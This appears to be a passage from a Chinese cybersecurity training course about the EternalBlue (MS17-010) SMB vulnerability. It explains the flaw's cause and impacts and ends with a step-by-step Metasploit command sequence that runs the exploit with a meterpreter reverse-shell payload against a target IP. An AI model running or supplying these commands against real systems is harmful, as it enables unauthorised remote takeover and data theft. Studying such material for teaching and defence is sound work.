千锋教育网络安全零基础视频教程-黑客攻防/Web安全/渗透测试/代码审计/信息安

永恒之蓝漏洞

一、漏洞概述

永恒之蓝漏洞是一种存在于微软操作系统中的安全漏洞，主要利用了Windows操作系统中SMB协议的漏洞。该漏洞允许攻击者通过445端口远程执行代码攻击，从而获得系统控制权或窃取个人信息。

二、漏洞成因

永恒之蓝漏洞的产生主要是由于微软操作系统中SMB协议的实现存在缺陷，导致在处理特定请求时无法正确验证用户身份或数据完整性。攻击者可以利用这一缺陷，通过发送恶意请求来触发漏洞并执行恶意代码。

三、漏洞影响和危害

永恒之蓝漏洞的影响和危害非常严重。一旦该漏洞被攻击者利用，可能导致以下问题：

1. 系统控制权丧失：攻击者通过利用永恒之蓝漏洞，可以远程控制受感染的系统，执行恶意操作，如窃取个人信息、删除文件或安装恶意软件等。
2. 数据泄露：攻击者可以利用漏洞窃取敏感数据，如用户密码、信用卡信息等。这些数据可能被用于非法活动，给用户带来严重损失。
3. 恶意软件传播：永恒之蓝漏洞的传播速度较快，可能导致网络中的多台设备受到感染。攻击者可以利用此漏洞迅速传播恶意软件，对整个网络造成威胁。
4. 系统崩溃或运行缓慢：由于漏洞导致系统资源被恶意程序占用，受感染的系统可能出现崩溃、运行缓慢或异常重启等问题。

四、利用

启用msf后依次输入：

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set RHOST 目标IP

set LHOST 本地IP

set LPORT 接口号

run

即可成功。